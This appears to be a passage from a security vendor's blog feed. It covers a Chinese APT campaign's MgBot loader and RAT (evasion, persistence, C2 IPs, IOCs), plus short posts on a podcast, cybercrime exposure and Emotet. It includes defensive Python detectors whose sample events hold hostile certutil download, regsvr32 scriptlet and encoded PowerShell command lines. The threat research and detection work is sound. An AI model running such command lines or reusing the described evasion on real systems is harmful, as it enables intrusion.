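    {"ts": 8, "pid": 4008, "ppid": 900, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32 /s "C:\Program Files\Vendor\plugin.dll"'},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def tokens(cmdline: str) -> list[str]:
    """Split a Windows command line, keeping quoted paths as single tokens."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def norm_path(p: str) -> str:
    return p.strip('"').lower()


def office_ancestor(event, by_pid, depth=4):
    """Walk up the parent chain a few levels looking for an Office process."""
    cur = event
    for _ in range(depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            return None
        if basename(cur["image"]) in OFFICE:
            return cur
    return None


def detect(events) -> list[dict]:
    events = sorted(events, key=lambda e: e["ts"])
    by_pid = {e["pid"]: e for e in events}
    fetched = {}      # local path written by certutil -> pid of that certutil
    alerts = []

    def alert(e, rule, detail):
        alerts.append({"pid": e["pid"], "rule": rule, "detail": detail})

    for e in events:
        img = basename(e["image"])
        argv = tokens(e["cmdline"])
        low = [a.lower() for a in argv]

        anc = office_ancestor(e, by_pid)
        if anc and img in SUSPICIOUS_CHILDREN:
            alert(e, "office_descendant", f"{basename(anc['image'])} -> {img}")

        if img == "certutil.exe" and "-urlcache" in low:
            url = next((a for a in argv if a.lower().startswith("http")), None)
            if url:
                out = argv[-1] if argv[-1] != url else None   # optional output path
                alert(e, "certutil_download", url)
                if out:
                    fetched[norm_path(out)] = e["pid"]

        if img == "regsvr32.exe" and "scrobj.dll" in low:
            target = next((a[3:].strip('"') for a in argv if a.lower().startswith("/i:")), "")
            alert(e, "squiblydoo", target)
            if norm_path(target) in fetched:
                alert(e, "certutil_to_regsvr32", f"scriptlet fetched by pid {fetched[norm_path(target)]}")

        if norm_path(e["image"]) in fetched:
            alert(e, "executed_certutil_download", e["image"])

    return alerts


def summarize(alerts) -> dict:
    return dict(Counter(a["rule"] for a in alerts))


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
    print(summarize(detect(EVENTS)))
```

In production the same logic maps onto Sysmon Event ID 1 or EDR process telemetry; the certutil-to-execution correlation is what separates this from the noisy generic “Office spawned cmd.exe” rule.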

The following diagram shows the overall execution process:

Figure 9: Overall execution process

“Boris Johnson Pledges to Admit 3 Million From Hong Kong” with MgBot (variant 3)

The last document used by the Chinese APT group in this campaign focused on events in Hong Kong. The file was embedded within an archive named “Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.rar”.

This document quotes the prime minister after China imposed a new security law on Hong Kong (Figure 10).

Figure 10: Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.

Similar to the other documents, it also uses template injection to download the remote template (Figure 11).

Figure 11: Remote template

The downloaded template (BNOHK.docx) is similar to ADIN.docx (variant 2): it uses DDE to download and drop the loader.

Payload analysis: MgBot (BLame, Mgmbot)

The dropped executable (ff.exe) is a new variant of a loader called MgBot that drops and loads the final payload. The loader masquerades as a Realtek Audio Manager tool (Figure 12).

Figure 12: File version information

It has four embedded resources, two of which are tagged with the Chinese (Simplified) language ID. This is one indicator suggesting the campaign is operated by a Chinese APT group.

Figure 13: Resource language

The loader starts by escalating privileges through a UAC bypass that abuses the CMSTPLUA COM interface (an auto-elevated COM object hosted by DllHost.exe).

MgBot uses several anti-analysis and anti-virtualization techniques. The code is self-modifying: it rewrites its own code sections at runtime, which makes static analysis of the sample harder.

MgBot avoids running in known virtualized or sandboxed environments such as VMware, Sandboxie and VirtualBox. To detect them it looks for the DLLs vmhgfs.dll (VMware shared folders), sbiedll.dll (Sandboxie) and vboxogl.dll (VirtualBox guest additions); if any of them is found, it enters an infinite loop without performing any malicious activity (Figure 14).

Figure 14: Anti-VMs

It also checks for security products on the victim machine and takes a different execution path if one is detected. For example, it checks for zhudongfangyu.exe, 360sd.exe and 360Tray.exe (Qihoo 360) and for MfeAVSvc.exe and McUICnt.exe (McAfee) in different parts of the code (Figure 15). The malware does not perform all the checks at once; it performs a couple of them at each of several stages of its execution.

Figure 15: Security products checks

Instead of calling the required APIs directly, the malware builds a function pointer table of resolved API addresses. Each API call is then made through the relevant index of this table.

Figure 16: Building function pointer table

For example, when the malware needs to invoke WinExec, it calls it through its index in the function pointer table.

Figure 17: Calling API through use of function pointer table

After building the API call table, the malware performs the following steps:

  • It calls CreateFileW to create iot7D6E.tmp (a random name starting with iot) in the %APPDATA%\Temp directory. This tmp file is a CAB archive that embeds the final payload.
  • It calls WriteFile to populate its content.
  • It calls CreateProcessInternalW to invoke expand.exe, which decompresses iot7D6E.tmp into ProgramData\Microsoft\PlayReady\MSIBACF.tmp\tmp.dat (the MSIBACF.tmp directory name is generated randomly: it starts with MSI and is followed by a combination of random numbers and characters).
Figure 18: Calling expand.exe
  • It calls CopyFileW to copy tmp.dat to pMsrvd.dll.
  • It calls DeleteFileW to delete tmp.dat.
  • It drops DBEngin.EXE and WUAUCTL.EXE in the ProgramData\Microsoft\PlayReady directory. Both are copies of rundll32.exe, used later to execute the dropped DLL.
  • It modifies the registry hive under HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt to make itself persistent. To perform this modification, it drops two registry files named iix*.tmp (random numbers appended to iix) into the %APPDATA%\Temp directory; these are the old and new registry hives for that location.

To load the dropped DLL (pMsrvd.dll), the loader registers it as a service DLL. Rather than creating a new service, it repurposes the already installed AppMgmt service to load the payload, as shown in the following images:

Figure 18: ServiceDll
Figure 19: ImagePath

Finally, it executes the dropped DLL by running net start AppMgmt. After the DLL is loaded, the loader creates a cmd file (lgt*.tmp.cmd) in the %APPDATA%\Temp directory with the content shown in Figure 20, then executes it to delete both the cmd file and the loader from the victim machine.

Figure 20: cmd file

We identified several variants of this loader. All of them drop the final payload using expand.exe or extrac32.exe and then use “net start AppMgmt” or “net start StiSvc” to execute the dropped DLL under one of the following svchost configurations:

  • svchost.exe -k netsvcs -p -s AppMgmt
  • svchost.exe -k netsvcs
  • svchost.exe -k imgsvc
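The persistence described above replaces the ServiceDll of an existing svchost-hosted service (AppMgmt, or StiSvc in other variants) with the dropped DLL. The following is an added example, not code from the original post, that checks a .reg export of those service keys against the expected Windows baseline. The export below is constructed (AppMgmt repointed at the dropped DLL, StiSvc untouched), and the baseline DLL names are what the author expects on a stock build; verify them against a known-good host before relying on them.

```python
"""Check the ServiceDll of the svchost-hosted services abused by this loader
(AppMgmt and StiSvc) against the expected Windows baseline, working from a
.reg export such as one produced with `reg export`. The parser handles the
hex(2) encoding (REG_EXPAND_SZ as UTF-16LE bytes) that .reg files use for
ServiceDll. Added example, not code from the original post."""
from typing import Dict, List, Tuple

# Constructed .reg export, not a real host. AppMgmt has been repointed at the
# dropped DLL; StiSvc is untouched (written as a plain string for brevity,
# although a real export also emits it as hex(2)).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt]
"ImagePath"="%SystemRoot%\\system32\\svchost.exe -k netsvcs -p"
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters]
"ServiceDll"=hex(2):43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,\
  44,00,61,00,74,00,61,00,5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,\
  74,00,5c,00,50,00,6c,00,61,00,79,00,52,00,65,00,61,00,64,00,79,00,5c,00,70,00,\
  4d,00,73,00,72,00,76,00,64,00,2e,00,64,00,6c,00,6c,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\StiSvc\Parameters]
"ServiceDll"="%SystemRoot%\\System32\\wiaservc.dll"
"""

SERVICES = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
# Expected ServiceDll file names for the two abused services (assumed baseline).
EXPECTED_DLL = {"AppMgmt": "appmgmts.dll", "StiSvc": "wiaservc.dll"}
SYSTEM32 = {r"%systemroot%\system32", r"c:\windows\system32"}


def decode_value(data: str):
    """Decode the data part of a .reg line into a Python value."""
    if data.startswith('"') and data.endswith('"'):                 # REG_SZ
        return data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    if data.startswith("dword:"):                                    # REG_DWORD
        return int(data[len("dword:"):], 16)
    if data.startswith("hex(2):"):                                   # REG_EXPAND_SZ, UTF-16LE
        raw = bytes(int(b, 16) for b in data[len("hex(2):"):].split(",") if b)
        return raw.decode("utf-16-le").rstrip("\x00")
    return data                                                      # other types left raw


def parse_reg(text: str) -> Dict[str, Dict[str, object]]:
    """Parse a .reg export into {key path: {value name: value}}."""
    keys: Dict[str, Dict[str, object]] = {}
    current = None
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        while line.endswith("\\"):          # hex data wraps with a trailing backslash
            line = line[:-1] + lines[i].strip()
            i += 1
        name, _, data = line.partition("=")
        keys[current][name.strip('"')] = decode_value(data)
    return keys


def check_service_dlls(keys: Dict[str, Dict[str, object]]) -> List[Tuple[str, str, str]]:
    """Return (service, verdict, ServiceDll) for each abused service that deviates
    from the baseline: wrong file name, or a DLL outside System32."""
    findings = []
    for service, expected_name in EXPECTED_DLL.items():
        params = keys.get(f"{SERVICES}\\{service}\\Parameters", {})
        dll = params.get("ServiceDll")
        if not isinstance(dll, str):
            findings.append((service, "missing", ""))
            continue
        directory, _, name = dll.lower().rpartition("\\")
        if name != expected_name or directory not in SYSTEM32:
            findings.append((service, "hijacked", dll))
    return findings


if __name__ == "__main__":
    for service, verdict, dll in check_service_dlls(parse_reg(SAMPLE_REG)):
        print(f"{service}: {verdict} {dll}")
```

On a live host the same check can be fed with the output of `reg export HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt appmgmt.reg` (and the StiSvc key), saved as UTF-8 before parsing; the ServiceDll deviation is the durable artifact here, since the loader deletes itself afterwards.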

The dropped DLL is the main payload this threat actor uses for malicious activity. Its file version information claims it is a Video Team Desktop App.

Figure 21: File info

The compile timestamp of this DLL appears to be “2008-04-26 16:41:12”. However, the Rich header data suggests this timestamp may have been tampered with by the threat actor.

Figure 22: Rich header

The DLL has eight exported functions with carefully chosen names that suggest benign tasks. It checks the running services and, depending on the result, can inject itself into the memory space of WmiPrvSE.exe.

Figure 23: Injection into WmiPrvse.exe
Figure 24: RAT’s DLL is injected into memory space of WmiPrvse.exe

It uses several anti-debugging and anti-virtualization techniques to detect whether it is running in a virtualized environment or under a debugger. For debugger detection it relies on timing checks built on the GetTickCount and QueryPerformanceCounter API calls.

To detect a virtual environment it uses instructions such as sldt and cpuid, which reveal information about the processor, and also probes the VMware I/O port backdoor (the “VMXh” magic value).

Figure 25: Environment Detection

All strings used by this RAT are either obfuscated or XOR-encoded to hinder analysis.
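The host-environment checks described above (the loader's anti-VM DLL names and security-product process names, and the RAT's WmiPrvSE.exe injection target) are exactly the strings an analyst wants to locate quickly in a new sample. The following is an added example, not code from the original post, of a triage scan for those indicators in both narrow (ASCII) and wide (UTF-16LE) form. Because the RAT's strings are described as XOR-encoded, the scan also brute-forces single-byte XOR keys; that key length is an assumption, since the post does not state the scheme. The sample buffer is constructed, not an MgBot binary.

```python
"""Triage scan for the indicator strings named in the MgBot analysis, in ASCII
and UTF-16LE, with single-byte XOR brute force (assumed scheme).
Added example, not code from the original post."""
from typing import Iterable, List, Tuple

# Indicator strings taken from the analysis above.
INDICATORS = [
    "vmhgfs.dll", "sbiedll.dll", "vboxogl.dll",        # anti-VM DLL checks
    "zhudongfangyu.exe", "360sd.exe", "360Tray.exe",  # Qihoo 360 processes
    "MfeAVSvc.exe", "McUICnt.exe",                    # McAfee processes
    "WmiPrvSE.exe",                                   # RAT injection target
]


def xor(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (key 0 leaves the data unchanged)."""
    return bytes(b ^ key for b in data)


def needles(indicator: str) -> Iterable[Tuple[str, bytes]]:
    """Windows binaries carry both narrow and wide strings; search for both."""
    yield "ascii", indicator.encode("ascii")
    yield "utf-16le", indicator.encode("utf-16-le")


def scan(sample: bytes, indicators=INDICATORS, keys=range(256)) -> List[Tuple[str, str, int, int]]:
    """Return (indicator, encoding, xor_key, offset) for every hit, ordered by offset.
    Key 0 reports plaintext strings; any other key is a candidate XOR key for
    an encoded string. Indicators are long enough that chance hits are unlikely."""
    hits = []
    for key in keys:
        decoded = xor(sample, key) if key else sample
        for indicator in indicators:
            for encoding, needle in needles(indicator):
                offset = decoded.find(needle)
                while offset != -1:
                    hits.append((indicator, encoding, key, offset))
                    offset = decoded.find(needle, offset + 1)
    return sorted(hits, key=lambda h: h[3])


# Constructed stand-in for a sample: filler bytes plus four planted strings.
# Not a real MgBot binary.
SAMPLE = (
    b"MZ\x90\x00" + bytes(range(0x10, 0x40))
    + b"vmhgfs.dll\x00"                                  # plain narrow string
    + "360Tray.exe".encode("utf-16-le") + b"\x00\x00"   # plain wide string
    + xor(b"sbiedll.dll", 0x5A)                          # narrow string XOR 0x5A
    + xor("WmiPrvSE.exe".encode("utf-16-le"), 0x37)      # wide string XOR 0x37
    + bytes(range(0x40, 0x80))
)

if __name__ == "__main__":
    for indicator, encoding, key, offset in scan(SAMPLE):
        print(f"0x{offset:04x} {indicator:<18} {encoding:<8} xor_key=0x{key:02x}")
```

Run against a real sample by reading the file into `SAMPLE`; a hit with a non-zero key gives both the key and the offset of the encoded string table, which is a good place to start when the XOR key is per-string rather than global.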

The final piece of code bundled in MgBot is a Remote Administration Trojan (RAT) with capabilities including:

  • C2 communication over TCP (42.99.116[.]225:12800)
  • Ability to take screenshots
  • Keylogging
  • File and directory management
  • Process management
  • Creating a mutex

Infrastructure relations

The following graph shows the infrastructure used by this APT group and the relations between its hosts. The group has used several IP addresses both to host its malicious payloads and for C2 communications.

Interestingly, most of the IP addresses used by this group are located in Hong Kong, and almost all of the Hong Kong-based addresses are used for C2 communication. Even in past campaigns the group has mostly used Hong Kong-based infrastructure. The graph also shows the relationships between the different IP addresses used by the group.

Figure 26: Infrastructure connections

Android RAT

We also found several malicious Android applications we believe are part of the toolset used by this APT group. Malwarebytes detects them as Android/Trojan.Spy.AndroRat.KSRemote.

Figure 27: Malicious Android APK

All these bogus applications contain a jar file named ksremote.jar that provides the RAT functionality:

  • Recording the screen and audio using the phone’s camera and microphone
  • Locating the phone by coordinates
  • Stealing phone contacts, call logs, SMS messages and web history
  • Sending SMS messages
Figure 28: Contact grabbing capability

This RAT communicates with its C&C servers on varying port numbers within the 122.10.89.170 to 179 range (all in Hong Kong):

  • 122.10.89[.]172:10560
  • 122.10.89[.]170:9552

TTPs in line with Chinese APTs

The lures used in this campaign indicate that the threat actor may be targeting the Indian government and individuals in Hong Kong, or at least those who are against the new security law issued by China.

The TTPs observed in these attacks have been used by several Chinese APT groups:

  • Rancor APT is known to use certutil to download its payloads
  • KeyBoy has used DDE in previous campaigns
  • APT40 has used Squiblydoo and template injection in previous campaigns

Considering these factors, we attribute this attack with moderate confidence to a new Chinese APT group. Based on its TTPs we were able to trace the group’s activities back to at least 2014. In all of its campaigns the actor has used a variant of MgBot.

A threat actor with a long documented history

A Needle in a haystack blog post from 2014 detailed a campaign that dropped a Trojan disguised as a legitimate MP3 encoder library. In that campaign the actor exploited CVE-2012-0158 to drop its Trojan. The rest of the TTPs, including the methods used to execute MgBot and the registry modifications, are similar to this ongoing campaign.

In 2018, the group ran another operation in which it exploited a VBScript engine vulnerability (CVE-2018-8174) to initiate the attack and drop a variant of MgBot. In March 2020, an archive file (warning.rar) was submitted to VirusTotal that we believe is part of another campaign by this actor.

We will continue to monitor this group’s activities to see whether its targeting or techniques evolve. Malwarebytes users are protected from this campaign thanks to our signature-less anti-exploit layer.

Figure 29: Malwarebytes Nebula blocking malicious Word document

MITRE ATT&CK techniques

Tactic               | ID    | Name                           | Details
Execution            | T1059 | Command-Line Interface         | Starts CMD.EXE for command execution
Execution            | T1106 | Execution through Module Load  | Loads dropped or rewritten executables: WUAUCTL.EXE, svchost.exe, rundll32.exe
Execution            | T1085 | Rundll32                       | Uses RUNDLL32.EXE to load the library
Execution            | T1064 | Scripting                      | WScript.exe starts MSHTA.EXE to open HTA or HTML files
Execution            | T1035 | Service Execution              | Starts NET.EXE for service management
Execution            | T1170 | Mshta                          | Starts MSHTA.EXE to open HTA or HTML files
Execution            | T1086 | PowerShell                     | Executes PowerShell scripts
Privilege Escalation | T1050 | New Service                    | Creates or modifies Windows services through rundll32.exe
Privilege Escalation | T1088 | Bypass User Account Control    | Known privilege escalation technique through DllHost.exe
Persistence          | T1031 | Modify Existing Service        | Creates or modifies Windows services through rundll32.exe
Persistence          | T1050 | New Service                    | Creates or modifies Windows services through rundll32.exe
Defense Evasion      | T1107 | File Deletion                  | Starts CMD.EXE for self-deletion
Defense Evasion      | T1085 | Rundll32                       | Uses RUNDLL32.EXE to load the library
Defense Evasion      | T1088 | Bypass User Account Control    | Known privilege escalation technique through DllHost.exe
Defense Evasion      | T1497 | Virtualization/Sandbox Evasion | The loader uses several anti-virtualization detection techniques
Defense Evasion      | T1221 | Template Injection             | The maldoc uses template injection to download a remote template
Defense Evasion      | T1218 | Signed Binary Proxy Execution  | Uses Squiblydoo (regsvr32.exe) to load the scriptlet
Discovery            | T1012 | Query Registry                 | Reads the machine GUID from the registry
Discovery            | T1082 | System Information Discovery   | Reads the machine GUID from the registry
Discovery            | T1007 | System Service Discovery       | Starts NET.EXE for service management
Lateral Movement     | T1105 | Remote File Copy               | certutil.exe downloads executable files from the Internet; cmd.exe starts certutil for downloading files
Command and Control  | T1105 | Remote File Copy               | certutil.exe downloads executable files from the Internet; cmd.exe starts certutil for downloading files
Table 1: MITRE ATT&CK TTPs

IOCs

2a5890aca37a83ca02c78f00f8056e20d9b73f0532007b270dbf99d5ade59e2a Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.docx

fc885b50892fe0c27f797ba6670012cd3bbd5dc66f0eb8fdd1b5fca9f1ea98cc BNOHK.docx.zip

3b93bc1e0c73c70bc8f314f2f11a91cf5912dab4c3d34b185bd3f5e7dd0c0790 Boris_Johnson_Pledges_to_Admit_3_Million_From_Hong_Kong_to_U.K.rar

ecf63a9430a95c34f85c4a261691d23f5ac7993f9ac64b0a652110659995fc03 Email security check.rar

1e9c91e4125c60e5cc5c4c6ef8cbb94d7313e20b830a1e380d5d84b8592a7bb6 Email security check.docx

3a04c1bdce61d76ff1a4e1fd0c13da1975b04a6a08c27afdd5ce5c601d99a45b ADIN.docx (storm.sct)

855af291da8120a48b374708ef38393e7c944a8393880ef51352ce44e9648fd8 ADIN.docx (storm.sct)

1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585 ff.exe (storm.txt)

99aee7ae27476f057ef3131bb371a276f77a526bb1419bfab79a5fac0582b76a cobalt strike

flash.governmentmm.com: This domain is used by the actor to host remote templates. It was registered three months ago by a registrant in the United States.

MgBot samples

2310f3d779acdb4881b5014f4e57dd65b4d6638fd011ac73e90df729b58ae1e0
e224d730e66931069d6760f2cac97ab0f62d1ed4ddec8b58783237d3dcd59468
5b0c93a70032d80c1f5f61e586edde6360ad07b697021a83ed75481385f9f51f
1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585
07bb016c3fde6b777be4b43f293cacde2d3aae0d4e4caa15e7c66835e506964f
7bdfabdf9a96b3d941f90ec124836084827f6ef06fadf0dce1ae35c2361f1ac6
8ab344a1901d8129d99681ce33a76f7c64fd95c314ac7459c4b1527c3d968bb4
f41bfc57c2681d94bf102f39d4af022beddafb4d49a49d7d7c1901d14eb698d2

45.77.245[.]0: Cobalt Strike C&C server.

42.99.116[.]225: C&C server used by the final payload.

Android samples

b5304a0836baf1db8909128028793d12bd418ff78c69dc6f9d014cadede28b77
9aade1f7a1f067688d5da9e9991d3a66799065ffe82fca7bb679a71d89fec846
5f7f87db34340ec83314313ec40333aebe6381ef00b69d032570749d4cedee46

The post Chinese APT group targets India and Hong Kong using new variant of MgBot malware appeared first on Malwarebytes Labs.

Lock and Code S1Ep11: Locating concerns of Bluetooth and beacon technology with Chris Boyd

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Chris Boyd, lead malware intelligence analyst for Malwarebytes, about Bluetooth and beacon technology.

Last month, cybersecurity experts warned the public about the data collection embedded in the Donald Trump 2020 re-election campaign’s mobile app. Once downloaded, the app requests broad access to user information, including device contacts, rough location, device storage, ID, call information, Bluetooth pairing, and more.

Tune in to hear about the progression of Bluetooth technology, how the tech is used in online advertising today, and more, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

Plus other cybersecurity news:

  • Google Cloud launches Confidential VMs, a new type of virtual machine that makes use of the company’s work around confidential computing to ensure that data isn’t just encrypted at rest but also while it is in memory. (Source: TechCrunch)
  • The GoldenHelper malware found in China-mandated software is even more extensive than originally thought. (Source: Ars Technica)
  • The Atlas of Surveillance shows which tech law enforcement agencies across the country have acquired. It’s a sobering look at the present-day panopticon. (Source: Wired)
  • The Cybersecurity and Infrastructure Security Agency (CISA) told federal agencies to patch wormable Windows DNS bug in 24 hours. (Source: BleepingComputer)
  • Blackrock is Android banking malware that can steal information from an estimated 337 apps, including Amazon, Facebook, Gmail and Tinder. (Source: Tom’s Guide)

Stay safe, everyone!

The post Lock and Code S1Ep11: Locating concerns of Bluetooth and beacon technology with Chris Boyd appeared first on Malwarebytes Labs.

How exposed are you to cybercrime?

No country, business, or person is immune to cybercrime, and as the Internet’s influence on our daily lives grows exponentially, so will the level of malicious activity throughout the world.

An ever-changing cyber landscape will always carry with it new threats, but are they the same for everyone? Who is attacked most often? Who is most at risk? And who is most exposed to cybercrime?

From endpoint attacks that are designed to gain unauthorized access, steal data, and extort money to cloud hacks that compromise and weaponize virtual machines, cybercrime can take many forms. And while new waves of threats evolve, cybersecurity hygiene doesn’t always follow suit.

There will always be a risk of falling victim to cybercrime, but it is important to remember that the very nature of risk can be boiled down to the chance that an event or situation will happen. A person, organization, or city could be at risk of an attack, but if they are prepared to defend against it, the situation is less dire.

Exposure, on the other hand, assumes an entity is subject to risk from a harmful action and, more importantly, that the entity will be negatively impacted by that risk.

Therefore, PasswordManagers.co chose to research the frequency of malicious attacks alongside the level of cybersecurity commitment across 108 countries to shine a spotlight on each country’s exposure to cybercrime.

Who is most exposed to cybercrime?

With a rating system from 0 to 1, the Cybersecurity Exposure Index calculates the level of exposure to cybercrime by country. The higher the score, the higher the exposure.

 


Out of 108 countries, Afghanistan is the most exposed, followed by Myanmar, Ethiopia, Palestine, and Venezuela.

Countries that are reliant on mobile and satellite connectivity, especially those in Africa that are fairly new to the digital landscape, are more susceptible to cyberattacks—this is reflected in the index. Africa leads the way for the highest exposure score per country (0.643), with 75 percent of its countries classified in the high and very high exposure groups. 

South America follows with an average score per country of 0.577. Venezuela is the most exposed and Uruguay the least.

Meanwhile, 67 percent of North American countries are classified in the moderate, low, and very low exposure groups, making it the second-least exposed continent. While the United States is the seventh-least exposed nation globally, it ranks as the least exposed country in North America—mainly as a result of having the second-highest commitment to cybersecurity of all countries.

Although Asia-Pacific places in the middle of the continent rankings with an average exposure score of 0.540, it contains some of the most exposed countries globally, including Afghanistan, with a full 1.0 exposure score, and Myanmar at 0.91. Areas surrounding the Middle East, including Pakistan and Uzbekistan, as well as pockets in central Asia, such as Mongolia and Nepal, remain under the international spotlight, meaning they will continue to attract the focus of cybercriminals and state-sponsored entities.

The front runner and least exposed continent is Europe (0.329). Seventy-one percent of European countries are classified in the low and very low exposure groups. Combined, Europe accounts for 67 percent of all countries with low and very low exposure. Finland is the least exposed country in both Europe and the world, with a score of 0.11. Following Finland, Denmark, Luxembourg, Estonia, and Norway round out the five least exposed European countries.

Learning from the best

Finland’s strong cybersecurity posture is a result of efforts from both public and private sectors to enforce cyber resilience by ensuring hygiene is met with discipline. Most notably, the Finnish government employs a cybersecurity strategy that ensures security efforts remain robust in today’s threat landscape in order to safeguard vital functions. The strategies are broken down into three key areas:

1. International cooperation: protection of the cyber environment without borders

2. Better coordination of cybersecurity management, planning, and preparedness

3. Developing cybersecurity competence  

One of the main reasons why Finland has managed to reduce its exposure and address threats effectively is because the strategies in place have been influenced by waves of cyberattacks that have been designed to worm their way through and penetrate antiquated security systems. This is a far cry from other countries, especially African states, where few have developed rigorous national cybersecurity strategies, let alone regulations and laws.

Why are exposure rates important?

The exposure rates underscore the importance of developing robust government technical institutions and frameworks for dealing with cybercrime, as well as encouraging businesses to actively elevate employee cybersecurity education and implement the necessary security systems to prevent attacks.

The Internet transcends international boundaries—we know that cybercrime is unique in that a cybercriminal doesn’t have to set foot in a specific country to attack its citizens or business entities. Existing criminal codes around the world are designed to deal with crimes that have been committed within the borders of a respective country, but to better fight cybercrime, closer global cooperation is required. Those countries ranking as the least exposed should consider sharing their knowledge and expertise with those who have a higher rate of exposure.

The rates also play an important role in educating those that reside in each country of their level of exposure. It’s not just governments and businesses that need to take action, but also individuals.

Coming to the forefront of educating on cybersecurity awareness and best practices are an increasing number of data breach reports, which document well that hackers are driven by financial gain. According to Verizon’s 2020 Data Breach Investigations Report, cybercriminals achieve that gain through lost or stolen credentials, which are involved in over 80 percent of breaches.

The average person has 70–80 passwords, and, unsurprisingly, managing these without the appropriate software is extremely difficult. This often leads to poor password practices that are exploited by hackers. While reusing the same password for multiple accounts may seem like a convenient option, users significantly increase risk of exposure and exploitation.

To decrease cybercrime exposure rate, a simple yet effective method of protection is to guard login credentials for all accounts by using a password manager to cocoon sensitive information in encryption away from prying eyes. Similarly, using software to remove malware, viruses, and other threats from your devices, as well as a secure VPN to protect online privacy, are both essential to maintaining cyber hygiene and ultimately, curtailing exposure to cybercrime.

The post How exposed are you to cybercrime? appeared first on Malwarebytes Labs.

It’s baaaack: Public cyber enemy Emotet has returned

It was never a question of “if” but “when”. After five months of absence, the dreaded Emotet has returned. Following several false alarms over the last few weeks, a spam campaign was first spotted on July 13 showing signs of a likely comeback.

The Emotet botnets started pushing malspam actively on Friday, July 17, using the same techniques as before. Malicious emails contain either a URL or an attachment. One familiar technique is to send the document as a reply within an existing email thread.

Emotet malicious emails with document attachment

The document contains a heavily obfuscated macro:

Emotet malware hidden in word document macro

Once the macro is enabled, it uses WMI to launch PowerShell, which retrieves the Emotet binary from one of several compromised websites, iterating through the list until it finds one that responds.

Emotet malware executing payload

Once the payload executes, it sends a confirmation back to one of Emotet’s command and control servers.
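Both the Emotet chain described here (a Word macro spawning PowerShell through WMI, so the PowerShell parent is WmiPrvSE.exe rather than Word) and the MgBot DDE chain described earlier on this page (Word spawning cmd.exe, which runs certutil -urlcache and then regsvr32 with scrobj.dll) are visible in process-creation telemetry as an unusual parent chain. The following is an added example, not code from either original post, of lineage-based detection over such events. The event records are constructed to resemble Sysmon Event ID 1 fields and are not real telemetry.

```python
"""Process-lineage detection for the Office-spawned download chains on this page:
MgBot (WINWORD -> cmd -> certutil -urlcache, then regsvr32 + scrobj.dll) and
Emotet (macro -> WMI -> PowerShell, parent WmiPrvSE.exe). Added example, not
code from the original posts; the events below are constructed."""
import re
from typing import Dict, List, Tuple

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
ENCODED_PS = re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)(?:\s|$)")

# Constructed process-creation events (pid, ppid, image, command line). Not real logs.
EVENTS = [
    {"pid": 50,  "ppid": 1,   "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k DcomLaunch"},
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\u\Downloads\Email security check.docx"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c certutil -urlcache -split -f http://example.invalid/storm.sct C:\Users\u\Documents\ff.sct"},
    {"pid": 310, "ppid": 300, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f http://example.invalid/storm.sct C:\Users\u\Documents\ff.sct"},
    {"pid": 320, "ppid": 300, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s /n /u /i:C:\Users\u\Documents\ff.sct scrobj.dll"},
    {"pid": 400, "ppid": 50,  "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmdline": "WmiPrvSE.exe -secured -Embedding"},
    {"pid": 410, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -verify cert.cer"},                      # benign admin use, must not alert
    {"pid": 510, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\inventory.ps1"},  # benign interactive use, must not alert
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lineage(event: Dict, by_pid: Dict[int, Dict], max_depth: int = 8) -> List[str]:
    """Image names from the event up through its ancestors (child first)."""
    chain, cur = [], event
    while cur is not None and len(chain) < max_depth:
        chain.append(basename(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return chain


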